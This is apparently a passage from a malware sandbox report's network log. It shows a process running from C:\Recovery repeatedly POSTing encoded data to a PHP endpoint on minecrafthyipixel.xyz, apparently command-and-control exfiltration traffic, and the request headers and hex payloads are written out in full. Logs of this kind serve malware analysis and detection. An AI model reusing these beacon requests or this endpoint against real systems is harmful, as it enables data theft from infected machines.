                                                                                                                                    Data Ascii: W_[\YGTY\^YYWUX^TZ_XT\S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>2V"+7$340;=7\1_ 28)4"2Q>+' 0:$[. X -
                                                                                                                                    Apr 19, 2024 13:43:06.152725935 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:06 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5arPmQ08188wz9R4F8EV3k2VZLOmvBIR47W6Ogad0KKqd1sLOSLNIrJWAAZeLIRIk6Mon9wngvLfCkF8f1aFob8Blth9sP8%2FJsiTj8YbVnifu6LX2Evn%2BvUVLQn6QTp7P2IR60d31g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca28d8d725082-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:06.152790070 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    50192.168.2.449798104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:06.372960091 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:06.477371931 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:06.477551937 CEST2512OUTData Raw: 57 5e 5e 54 5c 43 54 5d 5c 5e 59 59 57 53 58 5e 54 50 5f 5a 54 54 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^T\CT]\^YYWSX^TP_ZTTS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%=)5++&3$$+==(7^'*#%+172)*;/^",'.5$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:06.745974064 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:06 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RmHWiYSSliBiLSbF6EC1iBlt318XDMtLhojnCojit2ByiTUG8nx7IbDMHNCwOmVtJy%2Biou3SdeZuJmlbPy8GSY4gr%2B4jUat%2F2NMH4bdkptqi65uMF2YEDTLtieb9oE3VHlFaw1iGv6o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca291288eb09f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:06.746067047 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    51192.168.2.449800104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:07.096333981 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:07.200900078 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:07.201199055 CEST2512OUTData Raw: 57 55 5e 58 59 42 54 55 5c 5e 59 59 57 53 58 5b 54 53 5f 5e 54 54 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU^XYBTU\^YYWSX[TS_^TTS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>U5(;0%+T=+$&)T$82Q722Q*8;\",]9$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:07.501543045 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:07 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WSxydCVqkNAfEp6hB1Mcjb2xexPCrERXTMdajQez3AY55U0iuMVeEMqVv2FIxNYUZy5tuIrsjlMTBayle%2BYkELz%2B1jng5MJUjcoKOIQTNajdR0nTk0gixdCwj02hdcaDmbhDiU8wMNk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca295bcec1d7a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:07.501606941 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    52192.168.2.449801104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:07.755150080 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:07.860224009 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:07.862157106 CEST2504OUTData Raw: 57 5a 5b 5e 59 46 54 5e 5c 5e 59 59 57 57 58 59 54 53 5f 5a 54 59 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[^YFT^\^YYWWXYTS_ZTYS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>)5;$V7]3=8;':0T1"#!.Q)(' / Z:5$[. X -
                                                                                                                                    Apr 19, 2024 13:43:08.122669935 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzUCNxiQAD6MLcNcd723sQVx008E5vopE5W3o4FpFvY0AEl0oXveiRvuZm2gqJQukURLCrShQq0ZbQ35dWMPbH1hRvNlqFb%2BbLRIBJ78EoizC8MbgUhEEkfPhH%2FOabpKOQ2Rwesp9%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca299c82ead98-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:08.122725010 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    53192.168.2.449802104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:08.348087072 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:08.452589989 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:08.452737093 CEST2512OUTData Raw: 57 5e 5b 58 59 47 54 5c 5c 5e 59 59 57 52 58 59 54 54 5f 58 54 5f 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^[XYGT\\^YYWRXYTT_XT_SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[1V!]?$37^%(*?++_':$R16V &W*84489$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:08.825794935 CEST633INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LxfqE42iFs%2BidKzlMHMEZPVOAa%2FKDMh0SskOPQW52M%2B%2FzfsIfp731FdrVza8%2FvMGP%2BkexhQEim1cQjb8a7d88rEQA5lh61VJQSd%2FtR9adAtMC5vLcFGAw8Vev8V1jr%2F%2F9X5l9%2B9gncU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca29d8e4312d7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:08.825858116 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    54192.168.2.449803104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:09.087224007 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:09.192301989 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:09.192684889 CEST2192OUTData Raw: 57 5d 5e 58 5c 40 51 58 5c 5e 59 59 57 54 58 5b 54 53 5f 56 54 58 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^X\@QX\^YYWTX[TS_VTXSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\&>"T"#$ 0+!P=8Y19&+!4"*=' / [-5$[. X )
                                                                                                                                    Apr 19, 2024 13:43:09.447213888 CEST776INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:09 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z6N%2F7F43S%2FVn6RgxOePMk1vjdcvae4BzPH%2BSRLJ11kU3Tka2zj%2BFVBZ2DZJh1fBzBuH5XvL8jSz5fjpPnevo20NTtnSiBSNFl%2FrLK78Eh%2BIvn8lMuE%2FCYwC7jTOsuRPJf4TQ3cJ2Kl0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2a22e0a675d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 58 27 36 32 5e 22 3a 24 00 3d 30 39 07 2a 51 2a 06 2a 2a 29 17 34 3d 37 0b 2c 2a 0a 5d 28 5d 32 15 24 33 21 50 33 03 38 56 25 20 21 59 00 1a 39 58 34 3f 35 11 39 29 0b 1c 28 0f 21 5b 34 0b 2f 5a 3f 2d 32 0d 21 28 23 17 2b 58 3e 0f 3b 5e 30 53 28 38 3e 04 3b 0e 2e 58 22 11 2c 52 09 12 26 0c 3f 38 24 5e 26 56 26 0c 34 32 38 5d 28 3f 39 01 27 2b 28 12 25 55 3b 03 3a 54 25 08 32 00 35 54 28 39 2f 0f 23 5a 35 14 26 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$X'62^":$=09*Q***)4=7,*](]2$3!P38V% !Y9X4?59)(![4/Z?-2!(#+X>;^0S(8>;.X",R&?8$^&V&428](?9'+(%U;:T%25T(9/#Z5&.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:09.447278023 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    55192.168.2.449804104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:09.095097065 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:09.199755907 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:09.199933052 CEST2512OUTData Raw: 57 59 5e 5a 59 43 54 5c 5c 5e 59 59 57 55 58 52 54 57 5f 58 54 54 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^ZYCT\\^YYWUXRTW_XTTS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%X66; \$ +3;%>(&_?&>S !"Q=8 <9$[. X -
                                                                                                                                    Apr 19, 2024 13:43:09.553150892 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:09 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DWRaHC1oGMGrROihRsj1BZ3enNmif8xapqiYGApDYMBK%2BkOwRFcyPLT6s0TpnHihlbttJEmsY5X46quym2gF1ozh7BaGRmToJ4Gf4aHM3Q9WffhFRz8C0jH5EpjPF1j9xJS7kbHHc1o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2a22a47507f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:09.553212881 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    56192.168.2.449805104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:09.683151960 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:09.787811995 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:09.788089991 CEST2512OUTData Raw: 57 5f 5b 59 5c 44 54 59 5c 5e 59 59 57 56 58 59 54 55 5f 5a 54 5c 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[Y\DTY\^YYWVXYTU_ZT\S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&=!8?007$-V>8X%*,$+#5*/ /%$[. X !
                                                                                                                                    Apr 19, 2024 13:43:10.160159111 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:10 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhXBj725WwJLioc8G5WIVjIljoLdcjqtjDbqgnCwaMU%2F7ABDwffIONcoBDqoPMNnN4xv3dfO5zKybP0my%2BcRPaNNfTqQzcY183BzrB8yWDuUhxc8HPRwmt7r4NvuL7TWCD45%2FmaLq7o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2a5dae84526-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:10.160223007 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    57192.168.2.449806104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:10.392694950 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:10.497188091 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:10.497390032 CEST2512OUTData Raw: 57 54 5e 59 59 4b 54 5f 5c 5e 59 59 57 56 58 53 54 52 5f 5d 54 5f 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^YYKT_\^YYWVXSTR_]T_SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'-2!4]$#+[0(-=+$'9%67=8?^4,-5$[. X !
                                                                                                                                    Apr 19, 2024 13:43:10.759898901 CEST631INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:10 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=in0lmS%2BMGY3XAiKl7B3Yr7ImPdsuTlHiqJBR%2FB40QaYJd%2FdMfX1YNyAG%2BYtPYd4M%2FWdUbv%2Ffvoy78nY9aUZWJcaWp%2FSKlTcDU0tzRaoRmLf%2Fr36OBj4aYeZesxoTL0crv2tpwgu%2FjhQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2aa48bb4529-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:10.759963036 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    58192.168.2.449807104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:10.988138914 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
